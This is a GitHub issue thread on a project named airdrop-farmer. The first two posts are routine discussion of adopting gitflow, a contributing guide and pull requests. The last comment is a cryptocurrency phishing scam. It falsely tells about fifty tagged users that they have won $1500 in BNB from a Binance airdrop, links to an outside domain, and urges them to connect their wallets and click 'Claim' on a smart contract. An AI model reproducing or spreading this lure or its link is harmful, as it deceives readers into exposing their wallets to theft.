### ISSUE TITLE
Start adopting gitflow

### ISSUE THREAD

**Issue by omonimus1** [rvVcNk2p/airdrop-farmer#1]
- Read: https://davidepollicino.medium.com/setting-up-codebase-standards-since-day-0-d54ef83a8255
- Adds contribute guide
- Start using issues, branches, PULL requests, rather then direct push into your master branches.

**Comment by rvVcNk2p** [comment]
- [x] Attached link has been read
- [x] CONTRIBUTING.md file has been created
- [x] Issue, branches, Pull request has been initiated


@omonimus1 If you are available, check out please the opened pull request.

**Comment by sulthanallaudeen** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @tianrking, @longyi11111, @FarhanFDjabari, @bharathmb7, @arthaprihardana, @Jacevezh1, @MilkyRaven, @j0e1in, @TRNCL, @saleemoxd, @chukwuemekanweke, @dawoodkhalid333, @curiositycigar, @ZSSST, @sharonsunpeng, @sandboxcode, @Dumisani411, @Theracon, @SiuMai99, @ehsanshojaeiiii, @QinHai0627, @Roshan-VIPER, @imgaurav249, @HawkdotDev, @esalam1, @mdawar-cs, @Usama-RJ, @roo-shy, @Marchwarden, @viczhangge, @DiegoHeliosG, @padmanabhan-r, @jmhickman, @PPDEMOone, @anaskhan28, @tushar-asodariya, @kaisiant, @kadmm004, @jdram62, @andrescaro16, @bossonormal1, @alecgard, @BatistaTony, @apietosi, @Bunnyiii, @dev-ankur, @niroo96, @fmanimashaun, @shutdown57, @ismaArce
